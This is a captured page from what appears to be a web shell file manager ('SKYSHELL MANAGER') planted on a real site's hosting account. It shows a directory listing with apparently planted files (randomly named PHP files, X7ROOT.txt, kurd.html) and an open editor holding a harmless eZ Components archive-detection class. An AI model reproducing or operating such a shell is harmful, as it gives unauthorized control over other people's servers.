📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: file_type.php
<?php /** * File containing the abstract ezcArchiveFileType class. * * @package Archive * @version 1.4.1 * @copyright Copyright (C) 2005-2010 eZ Systems AS. All rights reserved. * @license http://ez.no/licenses/new_bsd New BSD License * @access private */ /** * This class provides methods to detect various archive or compression types. * * The archive formats that can be detected are: * - tar ( v7, ustar, pax, gnu ) * - zip * * The compression types that can be detected are: * - gzip * - bzip2 * * @package Archive * @version 1.4.1 * @access private */ class ezcArchiveFileType { /** * Returns the archive type of the given file. * * @param string $fileName Absolute or relative path to the file. * * @return int Possible values are: {@link ezcArchive::ZIP}, * {@link ezcArchive::TAR}, {@link ezcArchive::TAR_V7}, {@link ezcArchive::TAR_USTAR}, * {@link ezcArchive::TAR_PAX}, {@link ezcArchive::TAR_GNU}. */ public static function detect( $fileName ) { $fp = fopen( $fileName, "r" ); if ( $fp === false ) { return false; } $data = fread( $fp, 512 ); fclose( $fp ); if ( self::isGzip( $data ) ) { return ezcArchive::GZIP; } if ( self::isBzip2( $data ) ) { return ezcArchive::BZIP2; } if ( self::isZip( $data ) ) { return ezcArchive::ZIP; } // Order is important. if ( self::isPaxTar( $data ) ) { return ezcArchive::TAR_PAX; } if ( self::isV7Tar( $data ) ) { return ezcArchive::TAR_V7; } if ( self::isUstarTar( $data ) ) { return ezcArchive::TAR_USTAR; } if ( self::isGnuTar( $data ) ) { return ezcArchive::TAR_GNU; } return false; } /** * Checks if the provided $data matches the known signature of a Bzip2 archive. * * The $data string parameter must contain the first block of data from a file. It will be * matched against the known signature for this archive type. * * @param string $data * @return bool */ public static function isBzip2( $data ) { if ( ord( $data[0] ) == 0x42 && ord( $data[1] ) == 0x5a ) { return true; } return false; } /** * Checks if the provided $data matches the known signature of a Gzip archive. * * The $data string parameter must contain the first block of data from a file. It will be * matched against the known signature for this archive type. * * @param string $data * @return bool */ public static function isGzip( $data ) { $h = unpack( "Cid1/Cid2", $data[0] . $data[1] ); if ( $h["id1"] == 0x1f && $h["id2"] == 0x8b ) { return true; } return false; } /** * Checks if the provided $data matches the known signature of a Zip archive. * * The $data string parameter must contain the first block of data from a file. It will be * matched against the known signature for this archive type. * * @param string $data * @return bool */ public static function isZip( $data ) { if ( $data[0] . $data[1] == pack( "v", 0x4b50 ) ) { return true; } return false; } /** * Checks if the provided $data matches the known signature of a V7 tar archive. * * The $data string parameter must contain the first block of data from a file. It will be * matched against the known signature for this archive type. * * @param string $data * @return bool */ public static function isV7Tar( $data ) { if ( strcmp( substr( $data, 257, 5 ), "\0\0\0\0\0" ) == 0 && strcmp( substr( $data, 263, 2 ), "\0\0" ) == 0 ) { if ( self::tarContainsFileName( $data ) ) { return true; } } return false; } /** * Checks if the provided $data matches the known signature of a USTar archive. * * The $data string parameter must contain the first block of data from a file. It will be * matched against the known signature for this archive type. * * @param string $data * @return bool */ public static function isUstarTar( $data ) { if ( strcmp( substr( $data, 257, 5 ), "ustar" ) == 0 && strcmp( substr( $data, 263, 2 ), "00" ) == 0 ) { if ( self::tarContainsFileName( $data ) ) { return true; } } return false; } /** * Checks if the provided $data matches the known signature of a PAX tar archive. * * The $data string parameter must contain the first block of data from a file. It will be * matched against the known signature for this archive type. * * @param string $data * @return bool */ public static function isPaxTar( $data ) { if ( strcmp( substr( $data, 257, 5 ), "ustar" ) == 0 && strcmp( substr( $data, 263, 2 ), "00" ) == 0 ) { $type = substr( $data, 156, 1 ); if ( $type == "x" || $type == "g" ) { if ( self::tarContainsFileName( $data ) ) { return true; } } } return false; } /** * Checks if the provided $data matches the known signature of a GNU tar archive. * * The $data string parameter must contain the first block of data from a file. It will be * matched against the known signature for this archive type. * * @param string $data * @return bool */ public static function isGnuTar( $data ) { if ( strcmp( substr( $data, 257, 5 ), "ustar" ) == 0 && strcmp( substr( $data, 263, 2 ), " \0" ) == 0 ) { if ( self::tarContainsFileName( $data ) ) { return true; } } return false; } /** * Checks if the provided $data contains a file name. * * The $data string parameter must contain the first block of data from a file. It will be * matched against the known signature for this archive type. * * @param string $data * @return bool */ public static function tarContainsFileName( $data ) { return $data[0] != "\0"; } } ?>
Save